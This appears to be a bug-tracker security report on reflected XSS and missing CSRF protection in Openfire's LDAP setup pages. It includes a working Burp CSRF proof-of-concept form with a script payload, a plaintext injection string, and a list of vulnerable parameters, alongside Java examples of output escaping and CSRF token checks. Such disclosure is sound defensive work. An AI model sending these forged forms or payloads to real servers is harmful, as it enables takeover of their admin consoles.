XSS in LDAP setup pages

Description

The OpenFire setup configuration pages for LDAP servers have incorrect escaping of field data: values submitted to the form are echoed back into the page without HTML encoding.

The setup pages also fail to use CSRF token handling correctly, so the forms can be submitted from a third-party site.

Since escaping was corrected for other parts of setup, this looks like a failure to completely address the problem when the other pages in "setup" were fixed. (Grep is your friend.)

Exploit

The Proof of Concept below, generated by the Burp Suite Cross-Site Request Forgery testing tool, shows both the XSS and that the form is susceptible to cross-site request forgery.

When an attacker controls a web page and can persuade the administrator to visit it, and that browser is then (concurrently or afterwards) used to set up an Openfire instance through the web interface at an IP address or hostname the attacker knows, before the attacker's hold on the browser is lost (reboot or closing the browser), the attacker can take over the Openfire admin console and gain complete control of the Openfire instance's configuration.

The PoC below (exported from Burp) targets setup-ldap-server.jsp.

Submitting the string

uid"><plaintext>

as the UID field on setup-ldap-user.jsp shows that the same issue exists there and elsewhere.
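As an added illustration (this is not Openfire's code), the following Java shows the pattern the report describes: a submitted value echoed straight into a form field's value="..." attribute, an attribute escaper that neutralises the two payloads above, and a small scan that does what the "grep" suggestion asks for by listing value="<%= ... %>" expressions that do not pass through an escaping call. The helper names escapeHtml and escapeHTMLTags and the three sample JSP lines are assumptions made for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class LdapSetupEscaping {

    // The pattern the report describes: the submitted value is echoed back
    // into the field's value attribute with no encoding at all.
    static String renderHostFieldUnescaped(String host) {
        return "<input type=\"text\" name=\"host\" value=\"" + host + "\">";
    }

    // Encode the five characters that can terminate or alter an HTML attribute
    // or text node. Ampersand is handled like any other character in one pass,
    // so already-encoded input is not double-decoded by the browser.
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // The corrected rendering: the value can no longer close the attribute.
    static String renderHostFieldEscaped(String host) {
        return "<input type=\"text\" name=\"host\" value=\"" + escapeHtml(host) + "\">";
    }

    // Matches a JSP expression used as the whole value of a value="..." attribute.
    static final Pattern ECHO_IN_ATTR = Pattern.compile("value=\"<%=\\s*(.*?)\\s*%>\"");

    // Report (1-based line number, line text) for every echoed expression that is not
    // wrapped in one of the escaping helpers. The helper names are assumptions here;
    // substitute whatever helper the code base actually uses.
    static List<String> findUnescapedEchoes(String jspSource) {
        List<String> hits = new ArrayList<>();
        String[] lines = jspSource.split("\n");
        for (int i = 0; i < lines.length; i++) {
            Matcher m = ECHO_IN_ATTR.matcher(lines[i]);
            while (m.find()) {
                String expr = m.group(1);
                if (!expr.contains("escapeHtml(") && !expr.contains("escapeHTMLTags(")) {
                    hits.add((i + 1) + ": " + lines[i].trim());
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // The two payloads from this report, as they arrive after form decoding.
        String scriptPayload = "localhost\"><script>alert(document.domain);</script>";
        String plaintextPayload = "uid\"><plaintext>";

        System.out.println("unescaped: " + renderHostFieldUnescaped(scriptPayload));
        System.out.println("escaped:   " + renderHostFieldEscaped(scriptPayload));
        System.out.println("escaped:   " + renderHostFieldEscaped(plaintextPayload));

        // Constructed JSP fragment standing in for a setup page: lines 1 and 3 echo
        // unescaped, line 2 goes through the helper and should not be reported.
        String sampleJsp =
            "<input type=\"text\" name=\"host\" value=\"<%= host %>\">\n" +
            "<input type=\"text\" name=\"port\" value=\"<%= escapeHtml(port) %>\">\n" +
            "<input type=\"text\" name=\"basedn\" value=\"<%= baseDN %>\">";
        for (String hit : findUnescapedEchoes(sampleJsp)) {
            System.out.println("unescaped echo at line " + hit);
        }
    }
}
```

The scan is deliberately narrow (only value attributes); the same idea applied to every <%= ... %> in the setup directory is the check that would have caught the parameters listed below.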

Burp flagged XSS issues in:

/setup/setup-ldap-server.jsp [admindn parameter]
/setup/setup-ldap-server.jsp [adminpwd parameter]
/setup/setup-ldap-server.jsp [basedn parameter]
/setup/setup-ldap-server.jsp [host parameter]
/setup/setup-ldap-user.jsp [birthday parameter]
/setup/setup-ldap-user.jsp [businessCity parameter]
/setup/setup-ldap-user.jsp [businessCountry parameter]
/setup/setup-ldap-user.jsp [businessDepartment parameter]
/setup/setup-ldap-user.jsp [businessFax parameter]
/setup/setup-ldap-user.jsp [businessJobTitle parameter]
/setup/setup-ldap-user.jsp [businessMobile parameter]
/setup/setup-ldap-user.jsp [businessPager parameter]
/setup/setup-ldap-user.jsp [businessPhone parameter]
/setup/setup-ldap-user.jsp [businessState parameter]
/setup/setup-ldap-user.jsp [businessStreet parameter]
/setup/setup-ldap-user.jsp [businessZip parameter]
/setup/setup-ldap-user.jsp [email parameter]
/setup/setup-ldap-user.jsp [fullName parameter]
/setup/setup-ldap-user.jsp [homeCity parameter]
/setup/setup-ldap-user.jsp [homeCountry parameter]
/setup/setup-ldap-user.jsp [homeFax parameter]
/setup/setup-ldap-user.jsp [homeMobile parameter]
/setup/setup-ldap-user.jsp [homePager parameter]
/setup/setup-ldap-user.jsp [homePhone parameter]
/setup/setup-ldap-user.jsp [homeState parameter]
/setup/setup-ldap-user.jsp [homeStreet parameter]
/setup/setup-ldap-user.jsp [homeZip parameter]
/setup/setup-ldap-user.jsp [name parameter]
/setup/setup-ldap-user.jsp [nickname parameter]
/setup/setup-ldap-user.jsp [photo parameter]
/setup/setup-ldap-user.jsp [searchFields parameter]
/setup/setup-ldap-user.jsp [searchFilter parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [usernameField parameter]
/setup/setup-ldap-user.jsp [usernameField parameter]

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.56.101:9090/setup/setup-ldap-server.jsp" method="POST">
<input type="hidden" name="servertype" value="4" />
<input type="hidden" name="host" value="localhost&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&#59;&lt;&#47;script&gt;" />
<input type="hidden" name="port" value="389" />
<input type="hidden" name="basedn" value="base" />
<input type="hidden" name="admindn" value="" />
<input type="hidden" name="adminpwd" value="" />
<input type="hidden" name="connectionpool" value="true" />
<input type="hidden" name="ssl" value="false" />
<input type="hidden" name="starttls" value="false" />
<input type="hidden" name="debug" value="false" />
<input type="hidden" name="referrals" value="false" />
<input type="hidden" name="aliasreferrals" value="true" />
<input type="hidden" name="enclosedns" value="true" />
<input type="hidden" name="test" value="Test&#32;Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
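The PoC above works because the handler accepts any well-formed POST, whichever site served the form, and the attacker's page can supply every field. As an added example (not Openfire's code), the following Java sketches the per-session token check the report says is missing: a token is minted when the form is rendered, embedded as a hidden field the cross-site page cannot read, and required on POST before any setting is applied. Session, handlePost and the field name csrf are stand-ins for the servlet session and the real setup-ldap-server.jsp handler.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class SetupCsrfToken {
    private static final SecureRandom RNG = new SecureRandom();
    static final String TOKEN_ATTR = "csrf";

    // Stand-in for HttpSession: the token lives server-side, per session.
    static final class Session {
        final Map<String, String> attributes = new HashMap<>();
    }

    // Called when the form is rendered: one unguessable token per session.
    // URL-safe Base64 contains no quote characters, so it is safe in an attribute.
    static String issueToken(Session session) {
        String token = session.attributes.get(TOKEN_ATTR);
        if (token == null) {
            byte[] raw = new byte[32];
            RNG.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.attributes.put(TOKEN_ATTR, token);
        }
        return token;
    }

    // The hidden field the legitimate form carries and a cross-site form cannot
    // obtain (the same-origin policy stops the attacker's page reading it).
    static String hiddenField(Session session) {
        return "<input type=\"hidden\" name=\"csrf\" value=\"" + issueToken(session) + "\">";
    }

    // Called on POST before anything is written. Constant-time comparison so the
    // check does not leak the token byte by byte.
    static boolean verifyToken(Session session, String submitted) {
        String expected = session.attributes.get(TOKEN_ATTR);
        if (expected == null || submitted == null) {
            return false;
        }
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     submitted.getBytes(StandardCharsets.UTF_8));
    }

    // Simulated handler: reject before touching configuration, not after.
    static String handlePost(Session session, Map<String, String> params) {
        if (!verifyToken(session, params.get("csrf"))) {
            return "403 rejected: missing or wrong CSRF token";
        }
        return "200 applied: host=" + params.get("host");
    }

    public static void main(String[] args) {
        Session adminSession = new Session();
        hiddenField(adminSession); // the admin has loaded the real form once

        // The cross-site form from the Burp PoC: every field except the token.
        Map<String, String> forged = new HashMap<>();
        forged.put("host", "localhost\"><script>alert(document.domain);</script>");
        forged.put("port", "389");
        System.out.println(handlePost(adminSession, forged));

        // A submission from the rendered form carries the session's token.
        Map<String, String> legit = new HashMap<>(forged);
        legit.put("csrf", issueToken(adminSession));
        legit.put("host", "ldap.example.org");
        System.out.println(handlePost(adminSession, legit));
    }
}
```

The token check only closes the CSRF half of the report; the host value in the accepted request still has to be escaped on output, otherwise an administrator who types a hostile value (or is tricked into submitting one through the legitimate form) still gets script in the admin console.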

Environment

None
Fixed

Assignee

Greg Thomas

Reporter

Simon Waters